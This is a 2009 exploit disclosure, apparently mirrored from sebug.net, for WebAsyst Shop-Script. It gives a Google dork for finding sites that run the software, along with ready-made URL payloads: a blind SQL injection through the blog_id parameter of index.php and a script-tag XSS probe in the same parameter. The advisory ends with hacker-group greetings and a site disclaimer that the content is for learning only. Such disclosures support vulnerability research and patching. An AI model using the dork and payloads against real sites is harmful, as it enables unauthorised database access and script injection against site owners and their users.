============================================================================================= Title : (Blind SQL/XSS) Multiple Remote Vulnerabilities Software : WebAsyst Shop-Script Vendor : http://www.webasyst.net Date : 03 July 2009 (Indonesia) Author : Vrs-hCk Contact : d00r@telkom.net Blog : http://c0li.blogspot.com/ ============================================================================================= [-] Google Dork "Powered by WebAsyst Shop-Script" [-] Vulnerable (Blind SQL/XSS) index.php [-] Exploit (Blind SQL) http://[site]/[path]/index.php?ukey=news&blog_id=null and substring(@@version,1,1)=null [-] Exploit (XSS) http://[site]/[path]/index.php?ukey=news&blog_id=<script>alert(123)</script> ============================================================================================= Greetz : Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy, bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^) c0li.m0de.0n and Behave oR BeGone !!! ============================================================================================= # sebug.net
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论